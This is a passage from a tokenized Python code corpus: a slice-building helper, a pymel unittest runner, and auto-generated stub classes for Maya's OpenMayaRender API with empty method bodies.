<NUM_LIT:1> , None ) <EOL> else : <EOL> newslice = slice ( start , lastVal + <NUM_LIT:1> , step ) <EOL> thisStep = None <EOL> start = curr <EOL> else : <EOL> if lastStep == <NUM_LIT:1> : <EOL> newslice = slice ( start , lastVal + <NUM_LIT:1> , lastStep ) <EOL> thisStep = None <EOL> start = curr <EOL> else : <EOL> newslice = slice ( start , stop + <NUM_LIT:1> ) <EOL> start = lastVal <EOL> slices . append ( newslice ) <EOL> stop = None <EOL> step = None <EOL> lastStep = thisStep <EOL> stop = lastVal <EOL> lastVal = curr <EOL> if step is not None : <EOL> if step == <NUM_LIT:1> : <EOL> newslice = slice ( start , lastVal + <NUM_LIT:1> , None ) <EOL> else : <EOL> newslice = slice ( start , lastVal + <NUM_LIT:1> , step ) <EOL> slices . append ( newslice ) <EOL> else : <EOL> if lastStep == <NUM_LIT:1> : <EOL> slices . append ( slice ( start , lastVal + <NUM_LIT:1> , lastStep ) ) <EOL> else : <EOL> slices . append ( slice ( start , start + <NUM_LIT:1> ) ) <EOL> if lastStep is not None : <EOL> slices . append ( slice ( lastVal , lastVal + <NUM_LIT:1> ) ) <EOL> return slices <EOL> def izip_longest ( * args , ** kwds ) : <EOL> fillvalue = kwds . get ( '<STR_LIT>' ) <EOL> def sentinel ( counter = ( [ fillvalue ] * ( len ( args ) - <NUM_LIT:1> ) ) . pop ) : <EOL> yield counter ( ) <EOL> fillers = itertools . repeat ( fillvalue ) <EOL> iters = [ itertools . chain ( it , sentinel ( ) , fillers ) for it in args ] <EOL> try : <EOL> for tup in itertools . izip ( * iters ) : <EOL> yield tup <EOL> except IndexError : <EOL> pass </s>
<s> import unittest <EOL> import os <EOL> """<STR_LIT>""" <EOL> import sys <EOL> import inspect <EOL> gCantRun = False <EOL> try : <EOL> import nose <EOL> except ImportError : <EOL> gCantRun = True <EOL> print ( '<STR_LIT>' ) <EOL> if not gCantRun : <EOL> thisDir = os . path . dirname ( inspect . getsourcefile ( lambda : None ) ) <EOL> try : <EOL> import pymel_test <EOL> except ImportError : <EOL> sys . path . append ( thisDir ) <EOL> try : <EOL> import pymel_test <EOL> except ImportError : <EOL> gCantRun = True <EOL> import traceback <EOL> print ( '<STR_LIT>' ) <EOL> traceback . print_exc ( ) <EOL> if not gCantRun : <EOL> class TestPymel ( unittest . TestCase ) : <EOL> pymelDir = os . path . dirname ( thisDir ) <EOL> def testPymel ( self ) : <EOL> pymel_test . nose_test ( pymelDir = self . pymelDir ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> suite = unittest . TestLoader ( ) . loadTestsFromTestCase ( TestPymel ) <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( suite ) </s>
<s> import _OpenMayaRender <EOL> import weakref <EOL> from . import OpenMaya <EOL> from __builtin__ import object as _object <EOL> from __builtin__ import property as _swig_property <EOL> class MRenderData ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def screenToWorld ( * args , ** kwargs ) : <EOL> pass <EOL> def worldToScreen ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> aspectRatio = None <EOL> bottom = None <EOL> bytesPerChannel = None <EOL> depthArr = None <EOL> eyePoint = None <EOL> fieldOfView = None <EOL> internalData = None <EOL> left = None <EOL> perspective = None <EOL> resX = None <EOL> resY = None <EOL> rgbaArr = None <EOL> right = None <EOL> thisown = None <EOL> top = None <EOL> viewDirection = None <EOL> worldToEyeMatrix = None <EOL> xsize = None <EOL> ysize = None <EOL> __swig_destroy__ = None <EOL> class MRenderUtil ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def className ( * args , ** kwargs ) : <EOL> pass <EOL> def convertPsdFile ( * args , ** kwargs ) : <EOL> pass <EOL> def diffuseReflectance ( * args , ** kwargs ) : <EOL> pass <EOL> def eval2dTexture ( * args , ** kwargs ) : <EOL> pass <EOL> def exactFileTextureName ( * args , ** kwargs ) : <EOL> pass <EOL> def exactImagePlaneFileName ( * args , ** kwargs ) : <EOL> pass <EOL> def generatingIprFile ( * args , ** kwargs ) : <EOL> pass <EOL> def getCommonRenderSettings ( * args , ** kwargs ) : <EOL> pass <EOL> def hemisphereCoverage ( * args , ** kwargs ) : <EOL> pass <EOL> def inCurrentRenderLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def lightAttenuation ( * args , ** kwargs ) : <EOL> pass <EOL> def mainBeautyPassCustomTokenString ( * args , ** kwargs ) : <EOL> pass <EOL> def mainBeautyPassName ( * args , ** kwargs ) : <EOL> pass <EOL> def maximumSpecularReflection ( * args , ** kwargs ) : <EOL> pass <EOL> def 
mayaRenderState ( * args , ** kwargs ) : <EOL> pass <EOL> def raytrace ( * args , ** kwargs ) : <EOL> pass <EOL> def raytraceFirstGeometryIntersections ( * args , ** kwargs ) : <EOL> pass <EOL> def relativeFileName ( * args , ** kwargs ) : <EOL> pass <EOL> def renderObjectItem ( * args , ** kwargs ) : <EOL> pass <EOL> def renderPass ( * args , ** kwargs ) : <EOL> pass <EOL> def sampleShadingNetwork ( * args , ** kwargs ) : <EOL> pass <EOL> def sendRenderProgressInfo ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> kAll = <NUM_LIT:0> <EOL> kAmbientOnly = <NUM_LIT:3> <EOL> kBatchRender = <NUM_LIT:1> <EOL> kColorOnly = <NUM_LIT:1> <EOL> kDiffuseOnly = <NUM_LIT:4> <EOL> kHardwareRender = <NUM_LIT:4> <EOL> kInteractiveRender = <NUM_LIT:2> <EOL> kIprRender = <NUM_LIT:3> <EOL> kNotRendering = <NUM_LIT:0> <EOL> kShadowOnly = <NUM_LIT:2> <EOL> kSpecularOnly = <NUM_LIT:5> <EOL> class MD3D9Renderer ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def getD3D9Device ( * args , ** kwargs ) : <EOL> pass <EOL> def makeSwatchContextCurrent ( * args , ** kwargs ) : <EOL> pass <EOL> def readSwatchContextPixels ( * args , ** kwargs ) : <EOL> pass <EOL> def setBackgroundColor ( * args , ** kwargs ) : <EOL> pass <EOL> def theRenderer ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class RV_AOV ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> name = None <EOL> numberOfChannels = None <EOL> pPixels = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class new_instancemethod ( _object ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __cmp__ ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass 
<EOL> def __delattr__ ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __get__ ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __getattribute__ ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __hash__ ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __repr__ ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __setattr__ ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> __func__ = None <EOL> __self__ = None <EOL> im_class = None <EOL> im_func = None <EOL> im_self = None <EOL> __new__ = None <EOL> class MGeometry ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def assign ( * args , ** kwargs ) : <EOL> pass <EOL> def binormal ( * args , ** kwargs ) : <EOL> pass <EOL> def color ( * args , ** kwargs ) : <EOL> pass <EOL> def componentId ( * args , ** kwargs ) : <EOL> pass <EOL> def data ( * args , ** kwargs ) : <EOL> pass <EOL> def normal ( * args , ** kwargs ) : <EOL> pass <EOL> def position ( * args , ** kwargs ) : <EOL> pass <EOL> def primitiveArray ( * args , ** kwargs ) : <EOL> pass <EOL> def primitiveArrayCount ( * args , ** kwargs ) : <EOL> pass <EOL> def tangent ( * args , ** kwargs ) : <EOL> pass <EOL> def texCoord ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MHardwareRenderer ( _object ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def addDrawProcedure ( * args , ** kwargs ) : <EOL> pass <EOL> def backEndString ( * args , ** kwargs ) : <EOL> pass <EOL> def dereferenceGeometry ( * args , ** kwargs ) : <EOL> pass <EOL> def drawSwatchBackGroundQuads ( * args , ** kwargs ) : <EOL> pass <EOL> def findDrawProcedure ( * args , ** kwargs ) : <EOL> pass <EOL> def getBufferSize ( * args , ** kwargs ) : <EOL> pass <EOL> def 
getColorBufferPixelFormat ( * args , ** kwargs ) : <EOL> pass <EOL> def getCurrentExposureNumber ( * args , ** kwargs ) : <EOL> pass <EOL> def getDepthBufferPixelFormat ( * args , ** kwargs ) : <EOL> pass <EOL> def getDrawProcedureCount ( * args , ** kwargs ) : <EOL> pass <EOL> def getDrawProcedureListNames ( * args , ** kwargs ) : <EOL> pass <EOL> def getSwatchLightDirection ( * args , ** kwargs ) : <EOL> pass <EOL> def getSwatchOrthoCameraSetting ( * args , ** kwargs ) : <EOL> pass <EOL> def getSwatchPerspectiveCameraSetting ( * args , ** kwargs ) : <EOL> pass <EOL> def getSwatchPerspectiveCameraTranslation ( * args , ** kwargs ) : <EOL> pass <EOL> def getTotalExposureCount ( * args , ** kwargs ) : <EOL> pass <EOL> def glFunctionTable ( * args , ** kwargs ) : <EOL> pass <EOL> def insertDrawProcedure ( * args , ** kwargs ) : <EOL> pass <EOL> def makeResourceContextCurrent ( * args , ** kwargs ) : <EOL> pass <EOL> def makeSwatchContextCurrent ( * args , ** kwargs ) : <EOL> pass <EOL> def readSwatchContextPixels ( * args , ** kwargs ) : <EOL> pass <EOL> def referenceDefaultGeometry ( * args , ** kwargs ) : <EOL> pass <EOL> def removeDrawProcedure ( * args , ** kwargs ) : <EOL> pass <EOL> def restoreCurrent ( * args , ** kwargs ) : <EOL> pass <EOL> def theRenderer ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> kDefaultCube = <NUM_LIT:2> <EOL> kDefaultPlane = <NUM_LIT:1> <EOL> kDefaultSphere = <NUM_LIT:0> <EOL> kDepth_Float32 = <NUM_LIT:2> <EOL> kFailure = <NUM_LIT:1> <EOL> kItemExists = <NUM_LIT:2> <EOL> kItemNotFound = <NUM_LIT:3> <EOL> kLocationNotFound = <NUM_LIT:4> <EOL> kPostExposure = <NUM_LIT:2> <EOL> kPostRendering = <NUM_LIT:3> <EOL> kPreExposure = <NUM_LIT:1> <EOL> kPreRendering = <NUM_LIT:0> <EOL> kRGBA_Fix8 = <NUM_LIT:0> <EOL> kRGBA_Float16 = <NUM_LIT:1> <EOL> kSuccess = <NUM_LIT:0> <EOL> class MSwatchRenderBase ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ 
( self ) : <EOL> pass <EOL> def doIteration ( * args , ** kwargs ) : <EOL> pass <EOL> def image ( * args , ** kwargs ) : <EOL> pass <EOL> def node ( * args , ** kwargs ) : <EOL> pass <EOL> def resolution ( * args , ** kwargs ) : <EOL> pass <EOL> def swatchNode ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MRenderShadowData ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def worldToZbuffer ( * args , ** kwargs ) : <EOL> pass <EOL> def zbufferToWorld ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> depthMaps = None <EOL> internalData = None <EOL> lightPosition = None <EOL> lightType = None <EOL> midDistMaps = None <EOL> perspective = None <EOL> perspectiveMatrix = None <EOL> projectionMatrix = None <EOL> shadowResX = None <EOL> shadowResY = None <EOL> thisown = None <EOL> useMidDistMap = None <EOL> __swig_destroy__ = None <EOL> kDirectional = <NUM_LIT:2> <EOL> kInvalid = <NUM_LIT:0> <EOL> kPoint = <NUM_LIT:1> <EOL> kSpot = <NUM_LIT:3> <EOL> class MGeometryRequirements ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def addBinormal ( * args , ** kwargs ) : <EOL> pass <EOL> def addColor ( * args , ** kwargs ) : <EOL> pass <EOL> def addComponentId ( * args , ** kwargs ) : <EOL> pass <EOL> def addFaceOffsets ( * args , ** kwargs ) : <EOL> pass <EOL> def addNormal ( * args , ** kwargs ) : <EOL> pass <EOL> def addPosition ( * args , ** kwargs ) : <EOL> pass <EOL> def addTangent ( * args , ** kwargs ) : <EOL> pass <EOL> def addTexCoord ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MViewportRenderer ( _object ) : <EOL> def UIname ( * args , ** kwargs ) : <EOL> pass <EOL> def __init__ ( self , * args , ** kwargs ) : 
<EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def deregisterRenderer ( * args , ** kwargs ) : <EOL> pass <EOL> def initialize ( * args , ** kwargs ) : <EOL> pass <EOL> def name ( * args , ** kwargs ) : <EOL> pass <EOL> def nativelySupports ( * args , ** kwargs ) : <EOL> pass <EOL> def override ( * args , ** kwargs ) : <EOL> pass <EOL> def overrideThenStandardExclusion ( * args , ** kwargs ) : <EOL> pass <EOL> def registerRenderer ( * args , ** kwargs ) : <EOL> pass <EOL> def render ( * args , ** kwargs ) : <EOL> pass <EOL> def renderingOverride ( * args , ** kwargs ) : <EOL> pass <EOL> def setRenderingOverride ( * args , ** kwargs ) : <EOL> pass <EOL> def setUIName ( * args , ** kwargs ) : <EOL> pass <EOL> def uninitialize ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> kDirect3D = <NUM_LIT:1> <EOL> kExcludeAll = - <NUM_LIT:1> <EOL> kExcludeCVs = <NUM_LIT> <EOL> kExcludeCameras = <NUM_LIT:32> <EOL> kExcludeDeformers = <NUM_LIT> <EOL> kExcludeDimensions = <NUM_LIT> <EOL> kExcludeDynamicConstraints = <NUM_LIT> <EOL> kExcludeDynamics = <NUM_LIT> <EOL> kExcludeFluids = <NUM_LIT> <EOL> kExcludeFollicles = <NUM_LIT> <EOL> kExcludeGrid = <NUM_LIT> <EOL> kExcludeHairSystems = <NUM_LIT> <EOL> kExcludeHulls = <NUM_LIT> <EOL> kExcludeIkHandles = <NUM_LIT> <EOL> kExcludeImagePlane = <NUM_LIT> <EOL> kExcludeJoints = <NUM_LIT:64> <EOL> kExcludeLights = <NUM_LIT:16> <EOL> kExcludeLocators = <NUM_LIT> <EOL> kExcludeManipulators = <NUM_LIT> <EOL> kExcludeMeshes = <NUM_LIT:4> <EOL> kExcludeMotionTrails = <NUM_LIT> <EOL> kExcludeNCloths = <NUM_LIT> <EOL> kExcludeNParticles = <NUM_LIT> <EOL> kExcludeNRigids = <NUM_LIT> <EOL> kExcludeNone = <NUM_LIT:0> <EOL> kExcludeNurbsCurves = <NUM_LIT:1> <EOL> kExcludeNurbsSurfaces = <NUM_LIT:2> <EOL> kExcludePivots = <NUM_LIT> <EOL> kExcludePlanes = <NUM_LIT:8> <EOL> kExcludePluginShapes = <NUM_LIT> <EOL> kExcludeSelectHandles = <NUM_LIT> <EOL> 
kExcludeStrokes = <NUM_LIT> <EOL> kExcludeSubdivSurfaces = <NUM_LIT> <EOL> kExcludeTextures = <NUM_LIT> <EOL> kNoOverride = <NUM_LIT:0> <EOL> kOpenGL = <NUM_LIT:0> <EOL> kOverrideAllDrawing = <NUM_LIT:1> <EOL> kOverrideThenStandard = <NUM_LIT:2> <EOL> kOverrideThenUI = <NUM_LIT:3> <EOL> kSoftware = <NUM_LIT:2> <EOL> class MGLFunctionTable ( _object ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def extensionExists ( * args , ** kwargs ) : <EOL> pass <EOL> def glAccum ( * args , ** kwargs ) : <EOL> pass <EOL> def glActiveTexture ( * args , ** kwargs ) : <EOL> pass <EOL> def glActiveVaryingNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glAlphaFragmentOp1ATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glAlphaFragmentOp2ATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glAlphaFragmentOp3ATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glAlphaFunc ( * args , ** kwargs ) : <EOL> pass <EOL> def glAreProgramsResidentNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glAreTexturesResident ( * args , ** kwargs ) : <EOL> pass <EOL> def glArrayElement ( * args , ** kwargs ) : <EOL> pass <EOL> def glAttachObjectARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glBegin ( * args , ** kwargs ) : <EOL> pass <EOL> def glBeginFragmentShaderATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glBeginOcclusionQueryNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glBeginQueryARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glBeginTransformFeedbackEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBeginTransformFeedbackNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glBeginVertexShaderEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindAttribLocationARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindBufferARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindBufferBaseEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindBufferBaseNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindBufferOffsetEXT ( * 
args , ** kwargs ) : <EOL> pass <EOL> def glBindBufferOffsetNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindBufferRangeEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindBufferRangeNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindFragmentShaderATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindFramebufferEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindLightParameterEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindMaterialParameterEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindParameterEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindProgram ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindProgramNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindRenderbufferEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindTexGenParameterEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindTexture ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindTextureUnitParameterEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBindVertexShaderEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBitmap ( * args , ** kwargs ) : <EOL> pass <EOL> def glBlendEquationEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBlendFunc ( * args , ** kwargs ) : <EOL> pass <EOL> def glBlitFramebufferEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glBufferDataARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glBufferSubDataARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glCallList ( * args , ** kwargs ) : <EOL> pass <EOL> def glCallLists ( * args , ** kwargs ) : <EOL> pass <EOL> def glCheckFramebufferStatusEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glClear ( * args , ** kwargs ) : <EOL> pass <EOL> def glClearAccum ( * args , ** kwargs ) : <EOL> pass <EOL> def glClearColor ( * args , ** kwargs ) : <EOL> pass <EOL> def glClearDepth ( * args , ** kwargs ) : <EOL> pass <EOL> def glClearIndex ( * args , ** kwargs ) : <EOL> pass <EOL> def glClearStencil ( * args , ** kwargs ) : <EOL> pass <EOL> def glClientActiveTexture ( * args , ** 
kwargs ) : <EOL> pass <EOL> def glClipPlane ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3b ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3bv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3d ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3f ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3i ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3s ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3ub ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3ubv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3ui ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3uiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3us ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor3usv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4b ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4bv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4d ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4f ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4i ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4s ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4ub ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4ubv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4ui ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4uiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4us ( * args , ** kwargs ) : <EOL> pass <EOL> def glColor4usv ( * args , ** kwargs ) : <EOL> pass <EOL> def glColorFragmentOp1ATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glColorFragmentOp2ATI 
( * args , ** kwargs ) : <EOL> pass <EOL> def glColorFragmentOp3ATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glColorMask ( * args , ** kwargs ) : <EOL> pass <EOL> def glColorMaterial ( * args , ** kwargs ) : <EOL> pass <EOL> def glColorPointer ( * args , ** kwargs ) : <EOL> pass <EOL> def glCombinerInputNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glCombinerOutputNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glCombinerParameterfNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glCombinerParameterfvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glCombinerParameteriNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glCombinerParameterivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glCompileShaderARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glCompressedTexImage1D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCompressedTexImage2D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCompressedTexImage3D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCompressedTexSubImage1D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCompressedTexSubImage2D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCompressedTexSubImage3D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCopyPixels ( * args , ** kwargs ) : <EOL> pass <EOL> def glCopyTexImage1D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCopyTexImage2D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCopyTexSubImage1D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCopyTexSubImage2D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCopyTexSubImage3D ( * args , ** kwargs ) : <EOL> pass <EOL> def glCreateProgramObjectARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glCreateShaderObjectARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glCullFace ( * args , ** kwargs ) : <EOL> pass <EOL> def glCullParameterdvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glCullParameterfvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteBuffersARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteFencesNV ( * args , 
** kwargs ) : <EOL> pass <EOL> def glDeleteFragmentShaderATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteFramebuffersEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteLists ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteObjectARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteOcclusionQueriesNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeletePrograms ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteProgramsNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteQueriesARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteRenderbuffersEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteTextures ( * args , ** kwargs ) : <EOL> pass <EOL> def glDeleteVertexShaderEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glDepthFunc ( * args , ** kwargs ) : <EOL> pass <EOL> def glDepthMask ( * args , ** kwargs ) : <EOL> pass <EOL> def glDepthRange ( * args , ** kwargs ) : <EOL> pass <EOL> def glDetachObjectARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glDisable ( * args , ** kwargs ) : <EOL> pass <EOL> def glDisableClientState ( * args , ** kwargs ) : <EOL> pass <EOL> def glDisableVariantClientStateEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glDisableVertexAttribArray ( * args , ** kwargs ) : <EOL> pass <EOL> def glDrawArrays ( * args , ** kwargs ) : <EOL> pass <EOL> def glDrawBuffer ( * args , ** kwargs ) : <EOL> pass <EOL> def glDrawElements ( * args , ** kwargs ) : <EOL> pass <EOL> def glDrawPixels ( * args , ** kwargs ) : <EOL> pass <EOL> def glDrawRangeElements ( * args , ** kwargs ) : <EOL> pass <EOL> def glEdgeFlag ( * args , ** kwargs ) : <EOL> pass <EOL> def glEdgeFlagPointer ( * args , ** kwargs ) : <EOL> pass <EOL> def glEdgeFlagv ( * args , ** kwargs ) : <EOL> pass <EOL> def glEnable ( * args , ** kwargs ) : <EOL> pass <EOL> def glEnableClientState ( * args , ** kwargs ) : <EOL> pass <EOL> def glEnableVariantClientStateEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glEnableVertexAttribArray ( * args , 
** kwargs ) : <EOL> pass <EOL> def glEnd ( * args , ** kwargs ) : <EOL> pass <EOL> def glEndFragmentShaderATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glEndList ( * args , ** kwargs ) : <EOL> pass <EOL> def glEndOcclusionQueryNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glEndQueryARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glEndTransformFeedbackEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glEndTransformFeedbackNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glEndVertexShaderEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalCoord1d ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalCoord1dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalCoord1f ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalCoord1fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalCoord2d ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalCoord2dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalCoord2f ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalCoord2fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalMesh1 ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalMesh2 ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalPoint1 ( * args , ** kwargs ) : <EOL> pass <EOL> def glEvalPoint2 ( * args , ** kwargs ) : <EOL> pass <EOL> def glExecuteProgramNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glExtractComponentEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFeedbackBuffer ( * args , ** kwargs ) : <EOL> pass <EOL> def glFinalCombinerInputNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glFinish ( * args , ** kwargs ) : <EOL> pass <EOL> def glFinishFenceNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glFlush ( * args , ** kwargs ) : <EOL> pass <EOL> def glFlushVertexArrayRangeNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glFogCoordPointerEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFogCoorddEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def 